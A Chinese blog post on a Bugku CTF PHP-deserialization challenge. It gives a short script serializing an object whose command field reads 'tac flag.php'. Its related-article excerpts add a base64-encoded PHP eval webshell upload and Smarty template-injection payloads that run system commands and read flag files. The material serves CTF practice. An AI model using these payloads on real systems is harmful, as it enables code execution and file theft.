首页 > 其他分享 >Bugku-web安慰奖(序列化)

Bugku-web安慰奖(序列化)

时间:2023-08-30 09:12:44浏览次数:55  
标签:web Bugku 安慰 blog csdn 序列化

images

php序列化的一个题目;;

参考博客:https://blog.csdn.net/weixin_44190459/article/details/116648636

目前还没有搞明白怎么一回事:

<?php
class ctf{
protected $username='admin';
protected $cmd='tac flag.php';
}
$ctf=new ctf();
echo serialize($ctf);
;?>

标签:web,Bugku,安慰,blog,csdn,序列化
From: https://www.cnblogs.com/KAKSKY/p/17666339.html

相关文章

  • Bugku-xxx二手交易市场
    注入点在上传图片处,图片上传后会被base64编码,就从这里入手,上传一句话木马;image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=......
  • Bugku-聪明的php
    smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......
  • Web
    页面空空如也时 抓包入参为两个时,很可能一个是表示函数,另一个表示函数的参数可以使用file_get_contents(index.php)查看页面源码源码函数很多,无从下手时,尝试反序列化,下面这段代码可以直接放在phpstudy的www文件目录下,启动phpstudy后,直接打开localhost/xxx.php<?phpclass......
  • 02-移动web
    以下是对字体图标、2D转换、3D转换、动画rem、vw/vh、Flex布局模型、Less基础语法、视口分辨率、二倍图、移动适配、媒体查询、媒体查询bootstrap框架、栅格系统、组件和响应式网页布局的详细描述,并附上一些相关的代码示例。字体图标:字体图标是使用特殊字体文件中的字符来显示......
  • Web编辑器实现WORD粘贴公式自动上传
    ​ 1.编辑器修改(可选)1.1在 ueditor/config.json 中添加代码块    /* 上传word配置 */    "wordActionName":"wordupload",/* 执行上传视频的action名称 */    "wordFieldName":"upfile",/* 提交的视频表单名称 */    "wordPathFormat":"/p......
  • Bugku-misc-telnet
    刚结束的ciscn,里面的要是有这么简单就好了。下载附件,是个pcap文件,打开wireshark分析一节一节看过去就找到了flag没难度的~~~......
  • Bugku-Web13
    根据题意进行unescape解码,得到js脚本,将js脚本中的代码填入输入框中点击提交就得到了flag......
  • Bugku-Web12
    没啥思路,感觉自己在刷题,,,这个考虑的是本地管理员查看源码可以知道密码是base64加密的,使用工具解码就可以了!账号是admin,从评论里知道的...打开burp抓包,修改X-Forwarded-For:127.0.0.1即可......
  • Bugku-Web11
    没啥思路,在这个网站上不能右键弹出属性框,F12查看也没啥可看的,所以就去看了看评论,大概的套路有了,就只有实践了先安装dirsearch:https://github.com/maurosoria/dirsearch进入GitHub下载zip包,我拖到了kali里面安装,因为在wndows中解压输入命令就弹出dirsearch.py的文本文件,做完......
  • Bugku-Web10
    这个很简单!!!看了查看器,里面啥也没有,就看看网络,点开发现了flag......